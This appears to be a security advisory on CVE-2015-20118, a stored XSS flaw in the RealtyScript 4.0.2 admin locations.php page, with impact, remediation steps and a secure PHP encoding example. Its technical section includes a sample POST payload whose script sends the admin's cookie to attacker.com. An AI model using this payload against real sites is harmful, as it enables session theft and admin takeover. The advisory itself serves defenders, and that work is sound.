CVE-2015-20118: Stored XSS in RealtyScript 4.0.2 Admin Panel
A stored cross-site scripting (XSS) vulnerability originally discovered in 2015 has been formally catalogued by the NVD as CVE-2015-20118, carrying a CVSS score of 7.2 (High). The flaw resides in RealtyScript 4.0.2, a PHP-based real estate listing management platform developed by Next Click Ventures.
The vulnerability allows an attacker with access to the admin interface to inject persistent JavaScript payloads via the location_name parameter in the locations.php endpoint. Because the payload is stored server-side and rendered each time the admin panel loads, every subsequent admin session is exposed to the malicious script.
Vulnerability Overview
| Attribute | Value |
|---|---|
| CVE ID | CVE-2015-20118 |
| CVSS Score | 7.2 (High) |
| CWE Classification | CWE-79 — Improper Neutralization of Input During Web Page Generation (Stored XSS) |
| Affected Software | RealtyScript 4.0.2 (Next Click Ventures) |
| Attack Vector | Network |
| Authentication Required | Yes (admin interface access) |
| NVD Published | March 16, 2026 |
| Original Flaw Discovery | 2015 |
Technical Details
The vulnerability exists in the admin locations interface of RealtyScript 4.0.2. When an admin creates or edits a location entry, the location_name field value is stored in the database and later rendered into HTML pages without proper output encoding. This allows an attacker to embed JavaScript that executes in the browser of any admin who subsequently views the locations panel.
Attack surface:
POST /admin/locations.php
Content-Type: application/x-www-form-urlencoded
location_name=<script>document.location='https://attacker.com/steal?c='+document.cookie</script>&...
Successful exploitation can allow an attacker to:
- Steal admin session cookies — redirecting cookie contents to an attacker-controlled server
- Perform actions as the admin — submitting forms, modifying listings, or creating new accounts
- Maintain persistent access — the payload executes every time any admin visits the locations section
- Pivot to further attacks — using admin privileges to modify listing data or plant additional backdoors in the CMS
Context and Impact
RealtyScript is a self-hosted PHP real estate listing platform. While legacy and unlikely to be actively maintained in 2026, instances of version 4.0.2 may still be running on forgotten or unpatched web servers — a common risk with commercial PHP CMS platforms from the mid-2010s.
Who is affected:
- Any organization still running RealtyScript 4.0.2 without patching or migrating to a supported alternative
- Real estate agencies or property listing sites that deployed the software and have not audited their stack since its initial setup
Practical risk: The late NVD publication reflects the ongoing cataloguing effort for older vulnerabilities. The real-world exposure window is narrow, but stored XSS in admin panels represents a meaningful risk: a single exploited session can grant full application control. Any externally accessible instances should be treated as at-risk.
Remediation
- Upgrade or decommission — RealtyScript 4.0.2 is no longer actively maintained; migrate to a supported real estate platform or take the installation offline
- Apply output encoding — any custom forks or derivative installations should encode all user-supplied values before rendering them in HTML contexts using
htmlspecialchars()or equivalent - Implement Content Security Policy (CSP) — a strict CSP header can block inline script execution, mitigating the impact of stored XSS payloads even if they are injected
- Audit the database — inspect existing
location_namevalues in the database for stored payloads; sanitize or remove any suspicious entries - WAF rules — deploy a web application firewall to detect and block XSS patterns submitted to admin endpoints
Secure coding pattern:
// Vulnerable pattern — raw output
echo "<td>" . $row['location_name'] . "</td>";
// Secure pattern — output encoding
echo "<td>" . htmlspecialchars($row['location_name'], ENT_QUOTES, 'UTF-8') . "</td>";Key Takeaways
- CVE-2015-20118 is a stored XSS flaw in RealtyScript 4.0.2, now formally catalogued by NVD with CVSS 7.2 (High)
- Admin-accessible — the payload is injected via the
location_namefield inlocations.phpand persists in the database - Stored XSS is more dangerous than reflected XSS — every admin session that loads the locations panel is exposed after a single injection
- Legacy software risk — the flaw is from 2015; running unmaintained PHP CMSs is a common attack surface on forgotten servers
- Remediation: Decommission or upgrade; apply output encoding; add a Content Security Policy